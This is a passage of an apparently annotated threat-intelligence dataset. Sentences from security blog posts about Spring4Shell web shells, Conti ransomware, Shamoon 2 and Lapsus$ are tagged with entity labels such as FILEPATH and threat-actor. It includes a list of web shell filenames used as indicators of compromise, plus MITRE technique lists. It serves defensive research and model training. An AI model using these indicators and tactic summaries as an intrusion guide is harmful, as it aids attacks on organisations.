:679,"end_offset":688},{"id":47625,"label":"FILEPATH","start_offset":689,"end_offset":698},{"id":47626,"label":"FILEPATH","start_offset":699,"end_offset":735},{"id":47627,"label":"FILEPATH","start_offset":736,"end_offset":770},{"id":47628,"label":"FILEPATH","start_offset":779,"end_offset":815},{"id":47629,"label":"FILEPATH","start_offset":816,"end_offset":852},{"id":47630,"label":"FILEPATH","start_offset":853,"end_offset":887},{"id":47631,"label":"FILEPATH","start_offset":888,"end_offset":922},{"id":47633,"label":"FILEPATH","start_offset":958,"end_offset":992},{"id":47612,"label":"FILEPATH","start_offset":262,"end_offset":298},{"id":47613,"label":"FILEPATH","start_offset":299,"end_offset":335},{"id":47614,"label":"FILEPATH","start_offset":336,"end_offset":371},{"id":47615,"label":"FILEPATH","start_offset":373,"end_offset":409},{"id":47616,"label":"FILEPATH","start_offset":410,"end_offset":446},{"id":47617,"label":"FILEPATH","start_offset":447,"end_offset":483},{"id":47618,"label":"FILEPATH","start_offset":484,"end_offset":520},{"id":47632,"label":"FILEPATH","start_offset":923,"end_offset":957},{"id":47634,"label":"FILEPATH","start_offset":993,"end_offset":1027},{"id":47635,"label":"FILEPATH","start_offset":1028,"end_offset":1064},{"id":47637,"label":"FILEPATH","start_offset":1065,"end_offset":1101},{"id":47638,"label":"FILEPATH","start_offset":1102,"end_offset":1138},{"id":47645,"label":"FILEPATH","start_offset":1349,"end_offset":1383},{"id":47650,"label":"FILEPATH","start_offset":1524,"end_offset":1558},{"id":47652,"label":"FILEPATH","start_offset":1559,"end_offset":1593},{"id":47653,"label":"FILEPATH","start_offset":1594,"end_offset":1628},{"id":47639,"label":"FILEPATH","start_offset":1139,"end_offset":1173},{"id":47640,"label":"FILEPATH","start_offset":1174,"end_offset":1208},{"id":47641,"label":"FILEPATH","start_offset":1209,"end_offset":1243},{"id":47642,"label":"FILEPATH","start_offset":1244,"end_offset":1278},{"id":47643,"label":"FILEPATH","start_offset":1279,"end_offset":1313},{"id":47646,"label":"FILEPATH","start_offset":1384,"end_offset":1418},{"id":47647,"label":"FILEPATH","start_offset":1419,"end_offset":1453},{"id":47648,"label":"FILEPATH","start_offset":1454,"end_offset":1488},{"id":47649,"label":"FILEPATH","start_offset":1489,"end_offset":1523},{"id":47657,"label":"FILEPATH","start_offset":1709,"end_offset":1724},{"id":47658,"label":"FILEPATH","start_offset":1725,"end_offset":1759},{"id":47659,"label":"FILEPATH","start_offset":1760,"end_offset":1794},{"id":47644,"label":"FILEPATH","start_offset":1314,"end_offset":1348},{"id":47654,"label":"FILEPATH","start_offset":1629,"end_offset":1663},{"id":47655,"label":"FILEPATH","start_offset":1664,"end_offset":1673},{"id":47656,"label":"FILEPATH","start_offset":1674,"end_offset":1708},{"id":47660,"label":"FILEPATH","start_offset":1795,"end_offset":1829},{"id":47661,"label":"FILEPATH","start_offset":1830,"end_offset":1864},{"id":47662,"label":"FILEPATH","start_offset":1865,"end_offset":1899},{"id":47663,"label":"FILEPATH","start_offset":1900,"end_offset":1934},{"id":47664,"label":"FILEPATH","start_offset":1935,"end_offset":1969},{"id":47665,"label":"FILEPATH","start_offset":1970,"end_offset":2004},{"id":47666,"label":"FILEPATH","start_offset":2005,"end_offset":2039},{"id":47667,"label":"FILEPATH","start_offset":2040,"end_offset":2074},{"id":47668,"label":"FILEPATH","start_offset":2075,"end_offset":2085},{"id":47669,"label":"FILEPATH","start_offset":2086,"end_offset":2098}],"relations":[],"Comments":[]} {"id":2502,"text":"gdGCT.jsp","entities":[{"id":45552,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":2503,"text":"myshell.jsp","entities":[{"id":47670,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":2504,"text":"rakesh.jsp","entities":[{"id":47673,"label":"FILEPATH","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":2505,"text":"shei1.jsp","entities":[{"id":45553,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":2506,"text":"shell13.jsp","entities":[{"id":47674,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":2507,"text":"tomcatlogin.jsp","entities":[{"id":47676,"label":"FILEPATH","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":2508,"text":"data_theorem_spring4shell_scan.txt","entities":[{"id":45555,"label":"FILEPATH","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} {"id":2509,"text":"jarom_h1.jsp","entities":[{"id":47677,"label":"FILEPATH","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":2510,"text":"jquery123123123cssbackup7331.jsp tomjj.jsp test1.jsp hackerone0x.jsp inject.jsp poc4bugb.jsp curiositysec.jsp mynameis0bsecure.jsp tomcatwa.jsp ahmed.txt testqqsg.jsp wpz.jsp lelel.jsp shell.jsp 07935fdf05b66.jsp vulntest-12345.txt jquerycssv2.js poc.jsp tomcatspring.jsp ofc.jsp lalalalal.jsp safetytest.txt log.txt safetytest javatestfila.jsp checkexploit.jsp tomcatwar.jsp Updated April 19, 2022, at 7:30 a.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[{"id":47693,"label":"FILEPATH","start_offset":185,"end_offset":194},{"id":47678,"label":"FILEPATH","start_offset":0,"end_offset":32},{"id":47683,"label":"FILEPATH","start_offset":80,"end_offset":92},{"id":47685,"label":"FILEPATH","start_offset":93,"end_offset":109},{"id":47700,"label":"FILEPATH","start_offset":280,"end_offset":293},{"id":47704,"label":"FILEPATH","start_offset":328,"end_offset":344},{"id":47705,"label":"FILEPATH","start_offset":345,"end_offset":361},{"id":47706,"label":"FILEPATH","start_offset":362,"end_offset":375},{"id":47708,"label":"TIME","start_offset":377,"end_offset":416},{"id":47679,"label":"FILEPATH","start_offset":33,"end_offset":42},{"id":47680,"label":"FILEPATH","start_offset":43,"end_offset":52},{"id":47681,"label":"FILEPATH","start_offset":53,"end_offset":68},{"id":47682,"label":"FILEPATH","start_offset":69,"end_offset":79},{"id":47686,"label":"FILEPATH","start_offset":110,"end_offset":130},{"id":47687,"label":"FILEPATH","start_offset":131,"end_offset":143},{"id":47688,"label":"FILEPATH","start_offset":144,"end_offset":152},{"id":47689,"label":"FILEPATH","start_offset":154,"end_offset":166},{"id":47690,"label":"FILEPATH","start_offset":167,"end_offset":174},{"id":47694,"label":"FILEPATH","start_offset":195,"end_offset":212},{"id":47695,"label":"FILEPATH","start_offset":213,"end_offset":231},{"id":47692,"label":"FILEPATH","start_offset":175,"end_offset":184},{"id":47697,"label":"FILEPATH","start_offset":247,"end_offset":254},{"id":47696,"label":"FILEPATH","start_offset":232,"end_offset":246},{"id":47698,"label":"FILEPATH","start_offset":255,"end_offset":271},{"id":47699,"label":"FILEPATH","start_offset":272,"end_offset":279},{"id":47702,"label":"FILEPATH","start_offset":294,"end_offset":308},{"id":47703,"label":"FILEPATH","start_offset":309,"end_offset":316}],"relations":[],"Comments":[]} {"id":2511,"text":"This post is also available in: 日本語 (Japanese) Conti ransomware stands out as one of the most ruthless of the dozens of ransomware gangs that we follow.","entities":[{"id":45556,"label":"threat-actor","start_offset":53,"end_offset":69}],"relations":[],"Comments":[]} {"id":2512,"text":"The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services and law enforcement agencies.","entities":[],"relations":[],"Comments":[]} {"id":2513,"text":"Ireland has yet to recover from an attack in mid-May that prompted the shutdown of the entire information technology network of the nation's healthcare system – prompting cancellation of appointments, the shutdown of X-ray systems and delays in COVID testing.","entities":[{"id":47709,"label":"location","start_offset":0,"end_offset":7},{"id":47710,"label":"TIME","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} {"id":2514,"text":" Conti also stands out as unreliable.","entities":[{"id":45557,"label":"threat-actor","start_offset":1,"end_offset":6}],"relations":[],"Comments":[]} {"id":2515,"text":"We've seen the group stiff victims who pay ransoms, expecting to be able to recover their data.","entities":[],"relations":[],"Comments":[]} {"id":2516,"text":" The FBI has connected Conti to more than 400 cyberattacks against organizations worldwide, three-quarters of which are based in the U.S., with demands as high as $25 million.","entities":[{"id":47712,"label":"threat-actor","start_offset":23,"end_offset":28},{"id":47713,"label":"location","start_offset":133,"end_offset":137},{"id":47711,"label":"identity","start_offset":5,"end_offset":8}],"relations":[{"id":343,"from_id":47712,"to_id":47713,"type":"targets"}],"Comments":[]} {"id":2517,"text":"This makes Conti one of the greediest groups out there.","entities":[{"id":45558,"label":"threat-actor","start_offset":11,"end_offset":16}],"relations":[],"Comments":[]} {"id":2518,"text":" If you think you may have been impacted, please email unit42-investigations@paloaltonetworks.com or call (866) 4-UNIT42 to get in touch with the Unit 42 Incident Response team.","entities":[{"id":7555,"label":"EMAIL","start_offset":55,"end_offset":97},{"id":47714,"label":"identity","start_offset":146,"end_offset":176}],"relations":[],"Comments":[]} {"id":2519,"text":" We’ve followed Conti for more than a year through our work helping organizations respond to ransomware attacks.","entities":[{"id":47715,"label":"threat-actor","start_offset":16,"end_offset":21}],"relations":[],"Comments":[]} {"id":2520,"text":"It appears to be one of many private cybercrime groups that have set up their operations by leveraging the booming ransomware-as-a-service (RaaS) ecosystem.","entities":[],"relations":[],"Comments":[]} {"id":2521,"text":"Such gangs obtain their foothold in the networks of their victims by purchasing access from other threat actors, who sell it as a commodity.","entities":[{"id":47716,"label":"attack-pattern","start_offset":69,"end_offset":86}],"relations":[],"Comments":[]} {"id":2522,"text":"They can also procure infrastructure, malware, communications tools and money laundering from other RaaS providers.","entities":[],"relations":[],"Comments":[]} {"id":2523,"text":"Most of these actors use the same methods of access found in many ransomware attacks, such as phishing emails and exploiting unprotected internet-facing applications, the lack of multi-factor authentication (MFA), as well as the typical avenues used to preserve and enhance access once it’s achieved, such as through the use of Cobalt Strike or PowerShell.","entities":[{"id":47719,"label":"attack-pattern","start_offset":171,"end_offset":212},{"id":47717,"label":"attack-pattern","start_offset":94,"end_offset":109},{"id":47718,"label":"attack-pattern","start_offset":114,"end_offset":165},{"id":47720,"label":"tools","start_offset":328,"end_offset":341},{"id":47721,"label":"tools","start_offset":345,"end_offset":355}],"relations":[],"Comments":[]} {"id":2524,"text":" These approaches are not particularly clever or sophisticated, but often they are effective.","entities":[],"relations":[],"Comments":[]} {"id":2525,"text":"Conti’s methodology often follows the “double extortion” approach that many leading ransomware groups are presently using.","entities":[{"id":47722,"label":"threat-actor","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":2526,"text":"When using double extortion, attackers will not only lock up a victim’s files and demand ransom, but they will also steal files and threaten to publish them on a website or otherwise leak them if their initial ransom demand is not met. But Conti’s methods do have atypical elements.","entities":[{"id":47723,"label":"threat-actor","start_offset":241,"end_offset":247}],"relations":[],"Comments":[]} {"id":2527,"text":" Usually, the more successful ransomware operators put a lot of effort into establishing and maintaining some semblance of “integrity” as a way of facilitating ransom payments from victims.","entities":[],"relations":[],"Comments":[]} {"id":2528,"text":"They want to establish stellar reputations for “customer service” and for delivering on what they promise – that if you pay a ransom, your files will be decrypted (and they will not appear on a leak website).","entities":[],"relations":[],"Comments":[]} {"id":2529,"text":"Yet in our experience helping clients remediate attacks, Conti has not demonstrated any signs that it cares about its reputation with would-be victims.","entities":[{"id":45562,"label":"threat-actor","start_offset":57,"end_offset":62}],"relations":[],"Comments":[]} {"id":2530,"text":" In one recent case, Conti did not return a client’s files who had paid the ransom.","entities":[{"id":47724,"label":"threat-actor","start_offset":21,"end_offset":26}],"relations":[],"Comments":[]} {"id":2531,"text":"This client got only a small fraction of the file restorations that were promised before the Conti ransomware representatives disappeared back into the dark web.","entities":[{"id":47725,"label":"threat-actor","start_offset":93,"end_offset":98}],"relations":[],"Comments":[]} {"id":2532,"text":"In another case, our client needed an inventory of all files accessed, so that they could notify parties whose data was affected.","entities":[],"relations":[],"Comments":[]} {"id":2533,"text":"Conti agreed to share that information if a payment was made, then changed their minds, saying, “We do not own that data anymore.","entities":[],"relations":[],"Comments":[]} {"id":2534,"text":"It was deleted and there is no chance to restore it.”","entities":[],"relations":[],"Comments":[]} {"id":2535,"text":"Like many ransomware gangs, Conti is constantly adapting to changes, including recent heightened scrutiny by law enforcement and policy makers following high-profile disruptive attacks on the Colonial pipeline and healthcare organizations.","entities":[{"id":47726,"label":"threat-actor","start_offset":28,"end_offset":33},{"id":47727,"label":"identity","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} {"id":2536,"text":"When Ireland's healthcare system refused to pay any ransom, Conti provided the agency with what it said was a free decryption key.","entities":[{"id":47728,"label":"location","start_offset":5,"end_offset":12},{"id":47729,"label":"attack-pattern","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} {"id":2537,"text":"But there was a twist: The group maintained that it would still make good on its \"double extortion\" threat to publish stolen data on its leak site.","entities":[],"relations":[],"Comments":[]} {"id":2538,"text":" Unfortunately, keeping Conti out of your network often isn’t simple.","entities":[{"id":45565,"label":"threat-actor","start_offset":24,"end_offset":29}],"relations":[],"Comments":[]} {"id":2539,"text":"A primary means of infection appears to be through phishing scams, and attackers are constantly upping their game in this area.","entities":[{"id":47730,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} {"id":2540,"text":"While phishing emails used to be pretty easy for almost anyone to spot, particularly after some awareness training, we are seeing increasingly sophisticated attacks in which the threat actors have done plenty of homework on their intended victims.","entities":[{"id":47731,"label":"attack-pattern","start_offset":6,"end_offset":21}],"relations":[],"Comments":[]} {"id":2541,"text":"Sometimes they’ll send a blitz of scam emails to employees throughout an organization, and it takes only one to open the attachment and release the malware into the network. Ransomware attacks are getting easier to unleash, and the rewards to the attackers are still growing by leaps and bounds.","entities":[{"id":47733,"label":"attack-pattern","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} {"id":2542,"text":"Accordingly, it continues to be a growth industry that will attract multitudes of new practitioners, and it is likely that high-profile targets will continue to fall.","entities":[],"relations":[],"Comments":[]} {"id":2543,"text":" Palo Alto Networks detects and prevents Conti ransomware in the following ways: Additionally, Indicators of Compromise (IoCs) associated with Conti are available on GitHub, and have been published to the Unit 42 TAXII feed.","entities":[{"id":47735,"label":"threat-actor","start_offset":41,"end_offset":46},{"id":47734,"label":"identity","start_offset":1,"end_offset":19},{"id":47737,"label":"SOFTWARE","start_offset":167,"end_offset":173},{"id":47738,"label":"SOFTWARE","start_offset":206,"end_offset":213},{"id":47736,"label":"threat-actor","start_offset":144,"end_offset":149}],"relations":[],"Comments":[]} {"id":2544,"text":" Exploit Public-Facing Application [T1190], Spearphishing Attachment [T1566.001] Windows Command Shell [T1059.003], Native API [T1106] Deobfuscate\/Decode Files or Information [T1140], Obfuscated Files or Information [T1027], Dynamic-link Library Injection [T1055.001] File and Directory Discovery [T1083], Network Share Discovery [T1135], Process Discovery [T1057], System Network Configuration Discovery [T1016], System Network Connections Discovery [T1049] SMB\/Windows Admin Shares [T1021.002], Taint Shared Content [T1080] Data Encrypted for Impact [T1486], Inhibit System Recovery [T1490], Service Stop [T1489] Table 1.","entities":[{"id":45576,"label":"attack-pattern","start_offset":82,"end_offset":115},{"id":45577,"label":"attack-pattern","start_offset":117,"end_offset":135},{"id":45579,"label":"attack-pattern","start_offset":186,"end_offset":225},{"id":45580,"label":"attack-pattern","start_offset":227,"end_offset":269},{"id":45584,"label":"attack-pattern","start_offset":369,"end_offset":415},{"id":45586,"label":"attack-pattern","start_offset":463,"end_offset":499},{"id":45575,"label":"attack-pattern","start_offset":44,"end_offset":80},{"id":45587,"label":"attack-pattern","start_offset":501,"end_offset":529},{"id":45590,"label":"attack-pattern","start_offset":599,"end_offset":619},{"id":45574,"label":"attack-pattern","start_offset":1,"end_offset":42},{"id":45585,"label":"attack-pattern","start_offset":417,"end_offset":461},{"id":45578,"label":"attack-pattern","start_offset":137,"end_offset":184},{"id":45581,"label":"attack-pattern","start_offset":271,"end_offset":307},{"id":45582,"label":"attack-pattern","start_offset":309,"end_offset":340},{"id":45583,"label":"attack-pattern","start_offset":342,"end_offset":367},{"id":45588,"label":"attack-pattern","start_offset":531,"end_offset":564},{"id":45589,"label":"attack-pattern","start_offset":566,"end_offset":597}],"relations":[],"Comments":[]} {"id":2545,"text":"Courses of Action for Conti ransomware.","entities":[{"id":7672,"label":"threat-actor","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} {"id":2546,"text":" †These capabilities are part of the NGFW security subscriptions service.","entities":[],"relations":[],"Comments":[]} {"id":2547,"text":" * These analytic detectors will trigger automatically for Cortex XDR Pro customers.","entities":[{"id":45591,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} {"id":2548,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2549,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2550,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2551,"text":"Unit 42 researchers have been following the Shamoon 2 attacks closely since November 2016.","entities":[{"id":47739,"label":"identity","start_offset":0,"end_offset":7},{"id":47740,"label":"threat-actor","start_offset":44,"end_offset":53},{"id":47741,"label":"TIME","start_offset":76,"end_offset":89}],"relations":[],"Comments":[]} {"id":2552,"text":"To date, Shamoon 2 has unfolded in three separate attack waves on November 11, 2016, November 29, 2016, and January 23, 2017.","entities":[{"id":47742,"label":"TIME","start_offset":0,"end_offset":7},{"id":47743,"label":"threat-actor","start_offset":9,"end_offset":18},{"id":47744,"label":"TIME","start_offset":66,"end_offset":83},{"id":47745,"label":"TIME","start_offset":85,"end_offset":102},{"id":47746,"label":"TIME","start_offset":108,"end_offset":124}],"relations":[],"Comments":[]} {"id":2553,"text":" Based on our newest research, we can answer a question that many have had about these attacks: how is Shamoon 2 able to enter an organization’s network and spread so widely?","entities":[{"id":47747,"label":"threat-actor","start_offset":103,"end_offset":112}],"relations":[],"Comments":[]} {"id":2554,"text":"The answer is simple: credential theft.","entities":[{"id":47748,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} {"id":2555,"text":" Credential theft has been known to be a key part of the Shamoon 2 attacks.","entities":[{"id":47749,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":47750,"label":"threat-actor","start_offset":57,"end_offset":66}],"relations":[{"id":348,"from_id":47750,"to_id":47749,"type":"uses"}],"Comments":[]} {"id":2556,"text":"What our research is showing that’s new is how the attackers use the credentials once they’ve breached the network.","entities":[],"relations":[],"Comments":[]} {"id":2557,"text":" And from this we can see how credential theft is the keystone of Shamoon 2 attacks; if an organization can prevent credential theft, the Shamoon 2 attacks can’t succeed.","entities":[{"id":47751,"label":"attack-pattern","start_offset":30,"end_offset":46},{"id":47753,"label":"attack-pattern","start_offset":116,"end_offset":132},{"id":47752,"label":"threat-actor","start_offset":66,"end_offset":75},{"id":47754,"label":"threat-actor","start_offset":138,"end_offset":147}],"relations":[{"id":346,"from_id":47752,"to_id":47751,"type":"uses"},{"id":347,"from_id":47754,"to_id":47753,"type":"uses"}],"Comments":[]} {"id":2558,"text":" In our research, we’re able to outline that Shamoon 2 enters and spreads through an organization in three stages: These stages are outlined in the image below. And that credential theft is a key element in each stage: It’s also worth noting that credentials are a keystone issue in Shamoon 2 wave 2 too: we saw evidence of targeting an organization’s virtual desktop infrastructure (VDI) solutions with default credentials.","entities":[{"id":47755,"label":"threat-actor","start_offset":45,"end_offset":54},{"id":47758,"label":"campaign","start_offset":286,"end_offset":302},{"id":47756,"label":"attack-pattern","start_offset":172,"end_offset":188}],"relations":[{"id":349,"from_id":47758,"to_id":47756,"type":"uses"}],"Comments":[]} {"id":2559,"text":"While not stolen credentials, the effect is the same: attackers can use those credentials to abuse otherwise legitimate access and privileges to carry out their attacks.","entities":[],"relations":[],"Comments":[]} {"id":2560,"text":" At this time, we do not have research that explains definitively how the Shamoon 2 attackers have obtained these credentials.","entities":[{"id":47759,"label":"threat-actor","start_offset":74,"end_offset":83}],"relations":[],"Comments":[]} {"id":2561,"text":"We do believe there is evidence suggestive of a connection between Shamoon 2 and the Magic Hound campaign, which could indicate these two attack campaigns could have worked in conjunction with each other to execute the Shamoon 2 attacks.","entities":[{"id":47761,"label":"campaign","start_offset":85,"end_offset":105},{"id":47760,"label":"campaign","start_offset":67,"end_offset":76},{"id":47762,"label":"campaign","start_offset":219,"end_offset":228}],"relations":[{"id":350,"from_id":47761,"to_id":47760,"type":"related-to"}],"Comments":[]} {"id":2562,"text":" We also believe the presence of specific, valid named hosts from the network used in Stage 2 shows they were obtained directly from Active Directory on a domain controller.","entities":[{"id":47763,"label":"SOFTWARE","start_offset":133,"end_offset":149}],"relations":[],"Comments":[]} {"id":2563,"text":"This is also suggestive of access to the network through legitimate, stolen credentials.","entities":[],"relations":[],"Comments":[]} {"id":2564,"text":"In one sample we examined, we found a total of 844 hostnames.","entities":[],"relations":[],"Comments":[]} {"id":2565,"text":" This also helps to set context for how widely Disttrack can attempt to spread: 844 systems, each attempting to spread to 256, means that from one distribution server, Shamoon 2 attackers could potentially try to spread Disttrack to 216,064 systems; and that’s not counting if any of those infected systems, in turn, attempts to spread to an additional 256 systems.","entities":[{"id":45593,"label":"threat-actor","start_offset":168,"end_offset":177},{"id":45594,"label":"malware","start_offset":47,"end_offset":56},{"id":45595,"label":"malware","start_offset":220,"end_offset":229}],"relations":[],"Comments":[]} {"id":2566,"text":" Shamoon 2 attacks are very targeted to a specific region.","entities":[{"id":47764,"label":"threat-actor","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} {"id":2567,"text":"But it would be a mistake to write-off the threat that Shamoon 2 demonstrates.","entities":[{"id":47765,"label":"threat-actor","start_offset":55,"end_offset":64}],"relations":[],"Comments":[]} {"id":2568,"text":"Shamoon 2 attackers are using a rudimentary, but effective, distribution system of their own making.","entities":[{"id":45596,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":2569,"text":"The power of their attack doesn’t lie in the tools they use but in their ability to obtain and abuse legitimate credentials.","entities":[{"id":47766,"label":"attack-pattern","start_offset":84,"end_offset":123}],"relations":[],"Comments":[]} {"id":2570,"text":" This underscores why credential theft is something that organizations should prioritize as a top threat and take steps to understand it and prevent it.","entities":[{"id":47767,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} {"id":2571,"text":"We’ve recently published a new Unit 42 white paper on credential theft that we encourage you to read.","entities":[{"id":45597,"label":"identity","start_offset":31,"end_offset":38},{"id":45598,"label":"attack-pattern","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} {"id":2572,"text":"To help customers take steps to better understand and protect against this threat, we’ve posted information in our article PAN-OS Configuration Recommendations to Protect Against Shamoon 2 located in our Threat and Vulnerability Articles section on our Live Community.","entities":[{"id":47768,"label":"threat-actor","start_offset":179,"end_offset":188}],"relations":[],"Comments":[]} {"id":2573,"text":"You can also join in the discussion in our “About Threat and Vulnerability Discussions” on the Live Community.","entities":[],"relations":[],"Comments":[]} {"id":2574,"text":" Ignite ’17 Security Conference: Vancouver, BC June 12–15, 2017 Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals.","entities":[{"id":45599,"label":"TIME","start_offset":47,"end_offset":63},{"id":45600,"label":"location","start_offset":33,"end_offset":46}],"relations":[],"Comments":[]} {"id":2575,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} {"id":2576,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} {"id":2577,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2578,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2579,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2580,"text":"This post is also available in: 日本語 (Japanese) The Lapsus$ Group threat actor has grown in just a few months from launching a handful of destructive attacks to stealing and publishing source code of multiple top-tier technology companies.","entities":[{"id":45601,"label":"threat-actor","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} {"id":2581,"text":"Though sometimes called a ransomware group in reports, Lapsus$ is notable for not deploying ransomware in extortion attempts.","entities":[{"id":7789,"label":"threat-actor","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":2582,"text":"In today’s environment, threat actors favor using ransomware to encrypt data and systems and often extort victims for significant amounts of cryptocurrency in exchange for decryption keys, sometimes turning up the pressure with the threat of publishing stolen data.","entities":[],"relations":[],"Comments":[]} {"id":2583,"text":"Lapsus$, however, is unusual in its approach – for this group, notoriety most often appears to be the goal, rather than financial gain.","entities":[{"id":45602,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":2584,"text":" Unit 42 has helped organizations respond to multiple Lapsus$ attacks.","entities":[{"id":47769,"label":"identity","start_offset":1,"end_offset":8},{"id":7797,"label":"threat-actor","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} {"id":2585,"text":"The Lapsus$ Group doesn’t employ malware in breached victim environments, doesn’t encrypt data and in most cases, doesn’t actually employ extortion.","entities":[{"id":47771,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":47770,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":2586,"text":"They focus on using a combination of stolen credentials and social engineering to gain access to victims.","entities":[{"id":45603,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":45604,"label":"attack-pattern","start_offset":60,"end_offset":78}],"relations":[],"Comments":[]} {"id":2587,"text":"We’ve also seen them solicit employees on Telegram for their login credentials at specific companies in industries including: telecom, software, gaming, hosting providers and call centers.","entities":[{"id":47772,"label":"SOFTWARE","start_offset":42,"end_offset":50}],"relations":[],"Comments":[]} {"id":2588,"text":" However, the group’s attacks and leaking of stolen data even without extortion can be very damaging.","entities":[],"relations":[],"Comments":[]} {"id":2589,"text":"In addition, we’ve seen destructive Lapsus$ attacks where the actors got access to an organization’s cloud environment, wiped systems and destroyed over a thousand virtual machines.","entities":[{"id":45605,"label":"threat-actor","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} {"id":2590,"text":" Although there are no public indicators of compromise (IoCs), and no tactics, techniques and procedures (TTPs) that are unique to Lapsus$ Group, here we will summarize what is known of this threat actor to better enable defenders in understanding and mitigating this threat.","entities":[{"id":47773,"label":"threat-actor","start_offset":131,"end_offset":138}],"relations":[],"Comments":[]} {"id":2591,"text":"Early Targets of Lapsus$ Evolution of Targeted Organizations Mitigation Actions Conclusion","entities":[{"id":7821,"label":"threat-actor","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":2592,"text":"Additional Resources","entities":[],"relations":[],"Comments":[]} {"id":2593,"text":" We first observed the “Lapsus$” handle mid-2021, but the first attack activity quoting that handle was in August 2021, with some U.K. mobile phone customers reporting receiving threatening texts (Figure 1).","entities":[{"id":47774,"label":"threat-actor","start_offset":24,"end_offset":31},{"id":47776,"label":"TIME","start_offset":107,"end_offset":118},{"id":47777,"label":"location","start_offset":130,"end_offset":134},{"id":47775,"label":"TIME","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} {"id":2594,"text":"In December 2021, the Ministry of Health of Brazil fell victim to an attack claimed by Lapsus$ (Figure 2).","entities":[{"id":47778,"label":"TIME","start_offset":3,"end_offset":16},{"id":47780,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47779,"label":"identity","start_offset":22,"end_offset":50}],"relations":[{"id":351,"from_id":47780,"to_id":47779,"type":"targets"}],"Comments":[]} {"id":2595,"text":"This included the soon-to-be de rigueur data exfiltration and deletion technique, and also redirection of some DNS records.","entities":[],"relations":[],"Comments":[]} {"id":2596,"text":"This was followed in short order by attacks on South American telecoms providers Claro and Embratel, Brazilian state-owned postal service “Correios,” and Portuguese media giant Impresa.","entities":[{"id":47784,"label":"location","start_offset":101,"end_offset":110},{"id":47785,"label":"identity","start_offset":139,"end_offset":147},{"id":47786,"label":"location","start_offset":154,"end_offset":164},{"id":47781,"label":"location","start_offset":47,"end_offset":61},{"id":47783,"label":"identity","start_offset":91,"end_offset":99},{"id":47787,"label":"identity","start_offset":176,"end_offset":184},{"id":47782,"label":"identity","start_offset":81,"end_offset":86}],"relations":[{"id":352,"from_id":47787,"to_id":47786,"type":"located-at"},{"id":353,"from_id":47785,"to_id":47784,"type":"located-at"},{"id":354,"from_id":47782,"to_id":47781,"type":"located-at"},{"id":355,"from_id":47783,"to_id":47781,"type":"located-at"}],"Comments":[]} {"id":2597,"text":"This initial focus has led to speculation that Lapsus$ Group may be Brazilian, although we understand the choice of targets to have been influenced by extended team members rather than the team leadership.","entities":[{"id":47788,"label":"threat-actor","start_offset":47,"end_offset":54},{"id":47789,"label":"location","start_offset":68,"end_offset":77}],"relations":[{"id":356,"from_id":47788,"to_id":47789,"type":"located-at"}],"Comments":[]} {"id":2598,"text":" Apart from Argentinian eCommerce provider Mercado Libre \/ Mercado Pago, subsequent victimology has departed South America and pivoted to focus on the high-tech sector. Recent public victims have included: It should be understood that in addition there are likely any number of other victims, targeted by attacks not known in the public 